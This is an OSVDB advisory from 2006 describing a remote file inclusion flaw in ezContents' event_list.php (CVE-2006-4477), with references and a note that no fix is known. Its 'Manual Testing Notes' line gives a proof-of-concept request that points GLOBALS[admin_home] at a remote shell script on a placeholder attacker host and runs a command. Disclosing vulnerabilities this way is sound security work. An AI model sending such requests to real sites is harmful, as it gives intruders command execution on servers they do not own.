ezContents event_list.php GLOBALS[admin_home] Variable Remote File Inclusion

2006-08-28T09:48:55
ID OSVDB:28321
Type osvdb
Reporter DarkFig(gmdarkfig@gmail.com)
Modified 2006-08-28T09:48:55

Description

Vulnerability Description

ezContents contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the event_list.php script not properly sanitizing user input supplied to the 'GLOBALS[admin_home]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

ezContents contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the event_list.php script not properly sanitizing user input supplied to the 'GLOBALS[admin_home]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://[attacker]/sh.php&cmd=ls

References:

Vendor URL: http://www.ezcontents.org/ Secunia Advisory ID:21703 Related OSVDB ID: 28324 Related OSVDB ID: 28325 Related OSVDB ID: 28326 Related OSVDB ID: 28329 Related OSVDB ID: 28319 Related OSVDB ID: 28322 Related OSVDB ID: 28323 Related OSVDB ID: 28328 Related OSVDB ID: 28330 Related OSVDB ID: 28331 Related OSVDB ID: 28320 Related OSVDB ID: 28327 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0545.html CVE-2006-4477 Bugtraq ID: 19776